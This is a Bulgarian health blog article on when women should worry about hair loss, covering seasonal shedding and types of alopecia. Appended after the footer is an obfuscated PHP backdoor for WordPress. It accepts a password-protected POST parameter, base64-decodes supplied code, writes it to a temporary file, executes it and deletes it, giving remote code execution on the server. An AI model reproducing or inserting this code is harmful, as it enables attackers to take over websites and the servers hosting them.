Кога жените да се притесняват от косопада | Косопад

Кога жените да се притесняват от косопада

Косопадът при жените изисква внимание, за да разберете дали е обикновено смущение от смяната на сезоните или прикрива по- сериозен проблем, който трябва по- бързо да се разреши.

jeni-kosopad

През есента косата е по- чувствителна, както заради промените в температурата, както заради агресията през лятото (горещина, слънце, хлор, неправилно хранене…). Затова е нормално да имаме косопад, когато прокараме четката през косата си.

Косата, както е логично, се обновява постоянно, въпреки че не си даваме сметка, че постоянно пада. Можем да загубим по 100 косъма на ден. Косопадът при жените е абсолютно задължително обновяване, което пази косата здрава и я прави силна.

През есента е нормално да имаме косопад, но ако косата е доста и падането й продължи чак до зимата, трябва да проверите какво се случва. Не всеки косопад е еднакъв, затова потърсете специалист, ако продължава дълго време. Медицинският термин за косопад е алопеция и тя е различни видове:

На зони и внезапно
Засяга определени зони на главата, като косопадът се случва бързо и се получава петно под формата на монета.jenski-kosopad Произходът на тази алопеция е неизвестен.
Обща и малко по малко
Това е дифузната алопеция, косата става все по- тънка и чуплива. Скалпа започва да оголява и косата опадва.
Заради заболяване или лекарство
Има лекарства, които могат да причинят много силен косопад. Нарича се токсична алопеция и обикновено е временна. Когато спрете терапията, косата пониква отново.

05. март 2014 22:57:55 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}